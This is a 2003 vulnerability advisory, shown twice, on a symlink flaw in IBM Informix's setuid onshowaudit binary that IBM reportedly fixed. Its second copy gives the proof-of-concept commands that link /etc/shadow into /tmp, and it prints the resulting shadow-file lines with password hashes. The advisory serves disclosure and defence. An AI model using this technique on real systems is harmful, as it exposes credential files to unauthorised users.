Title: Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary
Date: 08-08-2003
Platform: Only tested in Linux but can be exported to others.
Impact: Users with exec perm over ./bin/onshowaudit can read
all system files.
Author: Juan Manuel Pascual Escriba <pask (at) open3s (dot) com [email concealed]>
Status: Solved by IBM Corp
PROBLEM SUMMARY:
Informix user or any user with AAO privileges can execute onshowaudit. This binary
is owned by root.informix with 6755 permision. As the endly point of its execution
thread onshowaudit try to read some files in /tmp directory without dropping any
privileges.
It's easy for an intruder to make a link to /etc/shadow or /root/.ssh/authorized_keys
of one of this files and read this files.
DESCRIPTION
Informix user or any user with AAO privileges an execute onshowaudit. This binary
is owned by root.informix with 6755 permision. As the endly point of its execution
thread onshowaudit reads
16231 open("/tmp/.0", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.1", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.2", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
....
16231 open("/tmp/.97", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.98", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 write(2, "Cannot open file \n", 18) = 18
without dropping privileges. It's easy to make a link:
wait for the output
....
aaa:!!:11635:0:99999:7:::
pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7:::
bbb:!!:11636:0:99999:7:::
cccc:!!:11636:0:99999:7:::
ddddd:!!:11647:0:99999:7:::
aaaaaa:!!:11806:0:99999:7:::
wwwwww:!!:11833:0:99999:7:::
zzz:!!:12027:0:99999:7:::
informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7:::
Program Over.
IMPACT:
Any user with AAO privileges over onshowaudit could read any system file.
STATUS
Reported to IBM security team at 11th of August 2003
See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask (at) open3s (dot) com [email concealed]
Barcelona - Spain http://www.open3s.com
----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------
Title: Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary
Date: 08-08-2003
Platform: Only tested in Linux but can be exported to others.
Impact: Users with exec perm over ./bin/onshowaudit can read
all system files.
Author: Juan Manuel Pascual Escriba <pask (at) open3s (dot) com [email concealed]>
Status: Solved by IBM Corp
PROBLEM SUMMARY:
Informix user or any user with AAO privileges can execute onshowaudit. This binary
is owned by root.informix with 6755 permision. As the endly point of its execution
thread onshowaudit try to read some files in /tmp directory without dropping any
privileges.
It's easy for an intruder to make a link to /etc/shadow or /root/.ssh/authorized_keys
of one of this files and read this files.
DESCRIPTION
Informix user or any user with AAO privileges an execute onshowaudit. This binary
is owned by root.informix with 6755 permision. As the endly point of its execution
thread onshowaudit reads
16231 open("/tmp/.0", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.1", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.2", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
....
16231 open("/tmp/.97", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.98", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 write(2, "Cannot open file \n", 18) = 18
without dropping privileges. It's easy to make a link:
[informix@dimoni tmp]$ ls -alc /etc/shadow
-r-------- 1 root root 1020 Aug 10 01:59 /etc/shadow
[informix@dimoni tmp]$ ln -s /etc/shadow .0
informix@dimoni tmp]$ /home/informix-9.40/bin/onshowaudit
wait for the output
....
aaa:!!:11635:0:99999:7:::
pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7:::
bbb:!!:11636:0:99999:7:::
cccc:!!:11636:0:99999:7:::
ddddd:!!:11647:0:99999:7:::
aaaaaa:!!:11806:0:99999:7:::
wwwwww:!!:11833:0:99999:7:::
zzz:!!:12027:0:99999:7:::
informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7:::
Program Over.
IMPACT:
Any user with AAO privileges over onshowaudit could read any system file.
STATUS
Reported to IBM security team at 11th of August 2003
See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask (at) open3s (dot) com [email concealed]
Barcelona - Spain http://www.open3s.com
[ reply ]